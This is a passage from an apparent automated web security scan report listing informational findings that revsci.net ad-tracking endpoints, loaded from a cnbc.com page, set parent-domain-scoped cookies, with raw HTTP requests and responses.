rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFOWlzUMTmbjeI5py/GeW6vTj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/o5PxXjqVBdRDmufS+NYRr1Q+VnhvMCavKi8EDZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtMbc8XnixKis2l+N3se7jHFkeQJh7tu1xdJ4Kjb8bCs31iSkOEOguNJRWKb9cIpJN1INL7RIiU3lSBLt1wGx1JyV7z9JBhn/5/LhztSBArx9QwfGZXN0Lbk6M79eT/3+cOXz8vI9WmFIBkVY8jEE/NBC3HMegMhYH+jdURJyHdNCALj6zuoKVXXOPTq+ODlXLzqEAFQZvziYQHbp+3bEhHvIhFldiE8MBro7UZPOnDb2wohgec5QwH/rkUCuesrJr9/xx/EsswTUJ69cs1ZRNN0=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47ssdu65JwdrFTCDRvsJSum2Nh/OoReJg2v9kDss6IjP7s8e9ziqupcY9YN6TjgPN/URf2EAYz+5gw6zw3vuST7p/TekuKQlkFzcEhmWSCCDZ+JZoqdYPR9buIQNe+1g/DwtERBSEZfzzKXV5RK/jWqBqeswgoo7pnibg6V7tJYgzNCqdbpw77QHRUtHFFnoVz91fCrKVSnd9KdSI3Z1WahAqH5m27RALV8jDVWQaOEfRhYIjecdIQm2Jh608+l09rXwXl7KXIogFmw8aSrm8tn3nWCLh+89ja0R4BdOrZ8eyZFE7ZBmJRKxDA0kkJ4VkxqjiDfiz/AuG536ioPjM2e/VPdv5MO6LldoQ7YCGnE4nkIm1S1uPirRLgHwicwZ7k0Xo9Bu27oUNMN4etcOEMfd5g9PVLIhPNAtI5fhGnhUlnq8MBu6R9P4hNxJSXnfe7x45/8rVbybSV5hEhy2rgMD1o6Ktudn8TBRShFizzdc/eT4sHL9fb/4r51E9H0gB25/A8UlI6X4flClOOAeXVY0HbRv1Vt9i9ovrbpE5qwoH6eAzoa5ID3vPC2Z56fU5gh/CZ9optArH+ZVXeEyXpPm8m/PM1sRrq+5E2UOo2EzHfA4AZ5A2k/FgE6FJQ3GtNNk=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:35:37 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:35:37 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.207. http://pix04.revsci.net/I10985/b3/0/3/1008211/927091024.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/927091024.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMKHIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZqR/m2ALq/mgP8FM+30dy40QSDpwLrthfKiUP6P4TijfFwc9SHbiJHg5KCkMjIzvI8dojLR2aXr8d5i6C8C7VgxY4ijIND8cny1zngi5AgmUy2z3/C1RtyfVlec6iWQoD5RrbNNlPzPL78P032FovR52TDX4bbBht4iLV99zjM1TiAiY5dXdsfxZwfROTF2lExlY5co5vKxth5EPCFb+XoGIP0tVD7NiqIRueCQModtcUOmdPzeji5tOQYFqP4WgwneVYXwmxZEzIuiRvtpCC6vEFBTtl/cqtRkjylQljZ2RzJAkbWrRui4RxWmVp4bbzRBIzh3TZTIO0lsHu0dNaDSUq2DDyTtVMxv1GD+fRdypn0r9bsjU3U00i6gpdCzJdBCfEQ6Rya6TrmK9MWKnC9FMO0N+rbJbO9GXkyZ9/JI9p102eUI7O1KiczN5QSIk0ZtC1Vx48kZ8cr+Tc/tbEwdirTluoYboJwOwvN/T20jBOLDdfRZmtFRKJIyzjiAHKnQO/wyFnhbIBP+Tokd9N3g785XpchwOSTNEkg72LuQq7hJcU9XoP09; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:57:24 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/927091024.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_1HRX="MLsXtSUNJjhvJpE4W8XcxPALFPJgPeDE7Ff6CLs1Rb8Vycmn5M/kolpihGBj4llhxqR9YOvGoDaU7n3PkF0UiflLT2U8DOmgVO/YWlRiBwIrbPpAc8e2VDA3Fy0Vrmb4xZ22/TJRrsBbxPCqZATA815Vb6OrwpvJR+zQ8ZGFw9PDFcB3F+Cwz5DlS7sHN97VJMpD4vzoOB0Ekv8p3l46pteiCTJytAVKFfDfJqeAcxwy8OFiGDkA3v65xcortoClA+NhmPj9YX6E2WnizVBjWuppNZQqUmLs8BB3dO30OOHUbyZCEAHXRbLPrchyJp18Ka/PUQ5Kd9feRzkUndIsGVnL/DK6ngaA8s3GpBOJ44nzIEvedkHNFJV/f70ZkVGEgNjFapsKCzfwoW82Z7YAQQbwiKUS4l4HxxAkhwO1JwKeXuaM2bpDyLy+eSwZwchkml1De90YWOIk02/kLws79DRzp3RtHdANOVVURejQBn+tzw+u4mJZNnuowS6DCuo1BssszSI7fVSdrXNoqvI7Ern8Ev1+U9VX8J5ajwix9Ta7gA9LQbk7krejiDwTHP691kFgGlo/gYBvhaxwEwrmE76LIosnMoaBM8I6sPFrayNapafqkNNgJ68VpXxAg8/81SdgT6yQcQPCQVUJlvufxQ+s8DAa8WkcrCvZ9/oJTqlsU4JTPsALF+diGpoEfxQBG/duKMN/HIcQS6jiJA6v5jRJimo8+txavMp4AE9IG7oRtWiwEr/Qnhl/QB5Q4KOfui8+QD9KAPeP4h1tgZiRBXwfXZWu7O62dy9VuY3RzwANhcjWp/6UA0/57MJ/CtSe2kg39hpKmJkuMdVFmNLkLzMvA7EilSTXkioqFYbi0XAvyTP7xQhU/9W/jAvJ5sjrRguvx0OICgoIuavwfKS+oDrw8FPgcgSq5ThjINeCssaQ0w7RedppyOHX18N7IMu15fksBQHc7KczG3YGe8fSuCc1qomDAbThH8pdqQr2ZPBlffPe4iHLoLaITsWD0hqHlNgYOsqamYupmNBWNnS7SbgiYqpXeT1x1s9DnlC0RFkAQsb4wqPPekz6i0ZtPjrDUo+cJIBfL1BlSYKc19udLK/DgIJIrZiTrKGpllz5LOixqOtCKtElY4kh2DEYWEUWzepHNrbkpmEP1ktDcuojdoRfUcr5GE+1F3Q1CBzoV9TdBISh7tNRK+brZPnynugQRPvjyE+Y60xVdWQIGp/c4jrzLKU245EtADE/BeE09F7uQnmFRG8pn4H6/K2IyEiScIFrmzYk1dk8csnKw5pwYQVnO9a3xLuMRgjgYMV7Hl3/0nkP82nOF3w8i/F1P00S+yk9nFVCLxzvq9Lbk6dwYHPfyw=="; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSwBfSHjrq8Yk+ulFzpImTPRZG965ba5IO512gB9+vbl6byANFyTJhbu2tH8VZhyPzXR27K7zqiDuJ/zTlJnHw6NLLrH6DRvNQYun6OEnNMId6BuhbhqVCW6mK5/OpNaC0t8igLY/4tLWs98nccpf3RMNYxqd3Cba2hZUhOvr3RbS4WmY/JpoypuPt62XFqVi26y21cp846w4J1oNfsfa3gdsvv/TQr9010uW8V68k8SmyHdFs6zkIFFRxHhKRqPHW2OKsN01SHNMYBQKPOvMYgZvn3349H0xAc2T7JNXqcNu0OkshtZayhCiO7LB9v4+4iYtxxNXgOfWR4kZuQuc1HmJc1WwVKPwDAiKOjMB80jRXfj0Qx1XgvxPMOwUf+f+Fyux2CRsDFSL4oadIATgQZ76adH6OgEQV+s3WDMaIBjv5kR80BgGVxF6TWG3OUmaSSK0KsNpkn9goI6R+O6RqEyKV6Y6L4xdLUrPiX/+AkKyLYUsAYUCgIQtU3UVO9MQ7M0nI0gHn/YOcrt8JEh3b6lbnlwvbu7pjF3OFasg6lsdnecccbs7u/mc8fAX83E9pgEmRJ3LXPHVktd2HeDBqBsrcxnSv0l6Zg78apOPubX52OcSFvO6lMiUX9w6/bN9BDF0xVk1Sf0KGYOlUBvx0Cx+NBg6YW9E+/J32wKoCCbBu4KL9NbqpY+903rH0fWmh8GrhAY0n5Y0P6kCXIiEmxLSOvCm5MEPF4CfEw304xSuEEGAkud/d8wWUH+9BvgKx3YYmyMRAf2ZeYdz8KlXfW1BcY02UtLT7xCy5wzegcvOR5I0exGUg17fF+94+6j4kAqZIsW7aenskzCS3f7yIvj/xieg+HlUh+WD8+dyUcDEudUTgOn/9p30D3exBHDmyySEaS+k4tEec0R1FpDAU/oKZsXljGz0wj2RXbp6SY+sNuvjEZu8Lk5wXl0HbnRMvv49BzNhMDxntv8UabacrPCXOEZIVi1FF89L0P4j+yIaHs/GOHlRho2lNn+2sKlIqwwqN4aD6+JY4EsIM3pOwuKZqhrxkjJAc4R4MzCiNSnTOHqcMa3UmEnzE4jfdyXTdxWu5s+vqVHcx3cglGcOZXgbOa9noEfoGrRch7eV9z8LL5MVQOafyygnDRhb874yN5FxCmqqEibql1J5kXlaDa2xqyd4PhGmVI4we2yrYj5+mAE4p1Bo1NGDYAjOJ0JkgrWadPfMo0SApCKvMtaamxL1k1UhtKWjZ60BKyKYNxKzUSHpfsKvamEuP7t3VkdnCkFOoyET7+JpbrRHk9msl0dUpXT0O2laq7+git06IJ6Vj3lTGE3P5BjBAOAYNoyFhyjb4g5rGv0KC/6nOmFnflH6QXTLRmCFX2YuzoEsnzjB/NXATTx0UzdFwd0s2juTD+nN/bMbwALPOnf/OUbyhDiHIa0Z40kEU+shFWFPkeNT7bS6lg54LBLPFDhXAVOvomNpZtrEDXtqzrjpjfH7/c+MORpvXtCCHMPaIsLI9Yu7kQP4fofcltHXsXirk7/ccp/33AJhmqKE+jLdl0ANbjR7i3Ndem8vo5nAR4x0HYvm3wVNahELV6UykLaLXk7g4jM0riAb6389VxSsjAFieOspZdA5ct8FtzTZ8Acb5Tq0vyFrTi+BHl04rUiBNnlgMfedMBOwIg3ry4lbHArl1EVij6V+DDyNownTsAUJafrpG2id1H5DgbX2xPi19xFIDOQ4pjg62D+R0v5EBMdQT6GRQxucssggWnTOsHX55361o="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kpy6i0cLlXjjhFLBrIbl2lJ/5FpXMpx8c0GKZrUAr7cCcVXyNs+wJLPx7lATedGW7bakuPox0QqSJaCt3t8baZzIbb+uXoH0ier+oa8h8ZvZlXBMGI4n9ut5BXWtvmDO7fF6Z1z9+ZZ3iC184u1IyB1rJ6fF+VzTMDj6yf/AxbINGkbPsmDE+s1Wf0apl2iCn8WX8PeygZCBoGQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMKHIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZqR/m2ALq/mgP8FM+30dy40QSDpwLrthfKiUP6P4TijfFwc9SHbiJHg5KCkMjIzvI8dojLR2aXr8d5i6C8C7VgxY4ijIND8cny1zngi5AgmUy2z3/C1RtyfVlec6iWQoD5RrbNNlPzPL78P032FovR52TDX4bbBht4iLV99zjM1TiAiY5dXdsfxZwfROTF2lExlY5co5vKxth5EPCFb+XoGIP0tVD7NiqIRueCQModtcUOmdPzeji5tOQYFqP4WgwneVYXwmxZEzIuiRvtpCC6vEFBTtl/cqtRkjylQljZ2RzJAkbWrRui4RxWmVp4bbzRBIzh3TZTIO0lsHu0dNaDSUq2DDyTtVMxv1GD+fRdypn0r9bsjU3U00i6gpdCzJdBCfEQ6Rya6TrmK9MWKnC9FMO0N+rbJbO9GXkyZ9/JI9p102eUI7O1KiczN5QSIk0ZtC1Vx48kZ8cr+Tc/tbEwdirTluoYboJwOwvN/T20jBOLDdfRZmtFRKJIyzjiAHKnQO/wyFnhbIBP+Tokd9N3g785XpchwOSTNEkg72LuQq7hJcU9XoP09; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:57:24 GMT; Path=/
X-Proc-ms: 6
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:57:23 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.208. http://pix04.revsci.net/I10985/b3/0/3/1008211/92794223.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/92794223.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWoZUQSG9hlG1bae3RCnDYdyPQRhCrxtrzkP3d14d3S5w0mtMH2weQSGYPTNWz9C1DH9tRfjw4t7jgY8E1Syo1RXJ3j/iiKhEBH6CcFOAsZTHyGci6z08ra07WZZuavu0gC4rxNnZ3nu/7w3rzBduHuYcjb1soyILRWKIS+7LyZ7TmE7e99bDIS7fGQBwxkT6ha934b0MUwGC7gJSChwg8lZOmUN8MQxPagP0x; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:27:25 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/92794223.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; 